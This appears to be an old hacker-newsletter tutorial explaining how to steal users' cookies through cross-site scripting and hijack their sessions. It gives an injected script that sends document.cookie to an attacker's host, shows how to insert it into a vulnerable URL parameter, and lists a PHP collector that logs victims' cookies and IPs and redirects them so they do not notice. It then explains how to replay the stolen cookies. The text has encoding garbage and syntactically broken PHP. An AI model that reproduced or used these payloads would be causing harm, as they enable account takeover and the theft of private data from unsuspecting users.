Newsletter Article(ready)
Javascript Cookie Stealing and XSS! By Grindordie As you all have or might not heard of cookie stealing. “Cookie Stealing†is when an attacker uses special scripts to steal information from the cookies of another user. Scenario: When a user logs into a site, some of the time the information such as passwords, usernames and many other things are stored in cookies. If you have access to a page where that site logged in some user, and the user visits your page. You can steal his/her cookies. How? Well its simple. All you need is to find access to a page where information is logged into the cookie. If you have access to a site like that you can steal cookies with the following line.
<script>window.location('http://www.mysite/cookie.php?cookie=' + document.cookie)</script> I don’t have access to a page, Can I still “Steal Cookies� Well it depends, you might not have access to a page, but you can find an XSS hole in that site. Whats is XSS hole? XSS stands for cross-site scripting, meaning you are able to use parts of a selected site to attack it, or steal information from it, such as cookies. Hmm… This sounds interesting, how does XSS work? XSS is mostly found in files that use variables. Lets take an PHP file as an example.
index.php?text=blah…blah The ?text=blah…blah is a variable. You might see this in guesbooks, sometimes the variable writes into the page. Lets say that in this case index.php?text=blah…blah is writing “blah…blah†into that page. If this works then you have a perfect XSS hole. So how do we apply the cookie stealing to this so called XSS hole? All you have to do is just replace the “blah…blah†with the
“<script>window.location('http://www.mysite/cookie.php?cookie=' + document.cookie)</script>†And now you will have something like this
index.php?text=<script>window.location('http://www.mysite/cookie.php?cookie=' + document.cookie)</script>or index.php?text=â€ÂÂÂÂ><script>window.location('http://www.mysite/cookie.php?cookie=' + document.cookie)</script> The “> part is just breaking loose of the code and insert the new one.
WAIT! What is the code that cookie.php has?
$cookie = $_GET['cookie’];
$ip = getenv ('REMOTE_ADDR';
$date=date("j F, Y, g:i a";
$referer=getenv ('HTTP_REFERER';
$fp = fopen('cookies.txt', 'a';
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>';
fclose($fp);
header ("Location: http://www.google.com/ ";
?>```
Ok now I am going to explain this PHP code.
<?php
// The opening words for any php code
```markup$cookie = $_GET['cookie’];
//Its just setting $_GET[‘cookie’] to $cookie$ip = getenv ('REMOTE_ADDR';
//Its doing the same thing as above
$date=date("j F, Y, g:i a";
//Its doing the same thing as above
$referer=getenv ('HTTP_REFERER';
//Its doing the same thing as above
$fp = fopen('cookies.txt', 'a';
//Here we are setting an variable to a function to open
//the file cookies.txt to write the cookies in.
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>';```
//Here we are writing the Cookie, IP addres, Date when it was retrieved,
//and Referer just incase if you forget what was the site.
fclose($fp);
//Here we are just closing the opening of the file to write the cookies.
header ("Location: http://www.google.com/ ";
//This is really not an important line that is needed..
//But its used to redirect the victim to google so he/she does not notice
?> //This is the closing of any php file
WOW! I got a cookie, now what?
Well this is one of the easiest steps. Now you go back to the site where your victim got his/her cookie stolen. And replace your cookies with your victims.
Example. You opened your cookie.txt file and you found something like this
```markupCookie: username=Grindordie; password=cookie_stealing_script; user_id=1;
IP: 127.0.0.1
Date and Time: 1/15/05 12:52 PM
Referer: http://www.somesite.com/index.php```
Now you go back to the site your victim got his/her cookie stolen in this case it will be http://www.somesite.com/index.php and you put in your address bar
javascript:alert(document.cookie=â€ÂÂÂÂusername=Grindordieâ€ÂÂÂÂ)
and you do the same for the others…
Note: the ; just separates the different information javascript:alert(document.cookie=†username=Grindordie; password=cookie_stealing_script; user_id=1;â€ÂÂÂÂ). Would NOT work, you need to do one by one.
After you set all you victims information to yours. You refresh the page and enjoy their stuff.
If you don’t have a cookie.txt file in the same folder as your cookie stealing script AND if the permissions(CHMOD) are not 777 then cookie would not be recorded into the file.
To make this technique work, you need to have a php file with the cookie stealing script and a file named “cookie.txt†with the permissions set at 777.